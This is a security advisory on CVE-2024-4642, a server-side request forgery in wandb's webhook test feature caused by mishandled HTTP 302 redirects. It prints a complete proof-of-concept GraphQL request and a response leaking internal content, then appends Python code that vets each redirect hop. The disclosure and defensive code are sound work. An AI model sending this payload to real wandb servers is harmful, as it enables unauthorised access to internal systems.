[Vulnerability Alert] wandb Information Disclosure Vulnerability (CVE-2024-4642)

cexlife 飓风网络安全 2024-05-17 17:02

Vulnerability description:

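Due to improper handling of HTTP 302 redirects, a server-side request forgery (SSRF) vulnerability exists in the wandb/wandb repository. The issue allows team members who have access to the 'User settings -> Webhooks' function to exploit it to reach internal HTTP(S) servers. In severe cases, for example on AWS instances, this could be abused to achieve remote code execution on the victim's machine. The vulnerability exists in the latest version of the repository.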

    POST /graphql HTTP/1.1
    Host: ip:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: http://ip:8080/settings
    content-type: application/json
    X-Origin: http://ip:8080
    Content-Length: 572
    Origin: http://ip:8080
    Connection: close

    {"operationName":"TestGenericWebhookIntegration","variables":{"entityName":"test","urlEndpoint":"http://{your-IP}:4444","requestPayload":"{\n\n\n\n\n}"},"query":"mutation TestGenericWebhookIntegration($entityName: String!, $urlEndpoint: String!, $accessTokenRef: String, $secretRef: String, $requestPayload: JSONString) {\n  testGenericWebhookIntegration(\n    input: {entityName: $entityName, urlEndpoint: $urlEndpoint, accessTokenRef: $accessTokenRef, secretRef: $secretRef, requestPayload: $requestPayload}\n  ) {\n    ok\n    response\n    __typename\n  }\n}\n"}

    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 18 Mar 2024 14:48:04 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 201
    Connection: close
    Vary: Origin
    X-Content-Type-Options: nosniff
    X-Ratelimit-Limit: 1000
    X-Ratelimit-Remaining: 1000
    Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0

    {"data":{"testGenericWebhookIntegration":{"ok":true,"response":"{\"response\":\"\u003ch1\u003eSSRF secret\u003c/h1\u003e\n\",\"error\":\"\"}","__typename":"TestGenericWebhookIntegrationPayload"}}}

Affected products:

wandb/wandb <= latest

Remediation:

An updated version is now available from the vendor. Affected users are advised to upgrade to the latest version.
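The description attributes the SSRF to improper handling of HTTP 302 redirects. The Python example below is added here and is not wandb's code or its fix: it vets every redirect hop of a webhook test before the request is made. `fetch` and `resolve` are hypothetical injected callables, and the hostnames, addresses and responses are constructed sample data.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

REDIRECTS = (301, 302, 303, 307, 308)

class BlockedDestination(Exception):
    """A webhook hop pointed at a destination the server must not reach."""

def check_destination(url, resolve):
    """Return the vetted IPs for url; raise unless all are publicly routable."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise BlockedDestination(f"unsupported URL: {url}")
    addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    # is_global is False for loopback, RFC 1918, link-local and similar ranges.
    if not addrs or not all(a.is_global for a in addrs):
        raise BlockedDestination(f"{url} does not resolve to a public address")
    return addrs

def deliver_test_webhook(url, fetch, resolve, max_hops=3):
    """Follow redirects by hand so each Location is vetted before any request."""
    for _ in range(max_hops + 1):
        addrs = check_destination(url, resolve)
        # fetch (hypothetical) must not auto-follow redirects and must connect
        # to the vetted IP, so a second DNS lookup cannot swap in another address.
        status, headers, body = fetch(url, addrs[0])
        if status not in REDIRECTS:
            return status, body
        if "Location" not in headers:
            raise BlockedDestination(f"redirect without Location from {url}")
        url = urljoin(url, headers["Location"])
    raise BlockedDestination("too many redirects")

# Constructed sample data: one public host whose /bounce path answers 302
# with a Location on an internal address.
DNS = {"hooks.example.com": ["93.184.216.34"]}
SITES = {
    "https://hooks.example.com/ok": (200, {}, "received"),
    "https://hooks.example.com/bounce": (302, {"Location": "http://10.0.0.5:8080/"}, ""),
}

def fake_resolve(host):
    try:
        return [str(ipaddress.ip_address(host))]  # literal IP in the URL
    except ValueError:
        return DNS.get(host, [])

def fake_fetch(url, ip):
    return SITES[url]
```

Validating only the URL the user submits is not enough here: the first hop in the sample passes the check, and the block happens on the `Location` it returns.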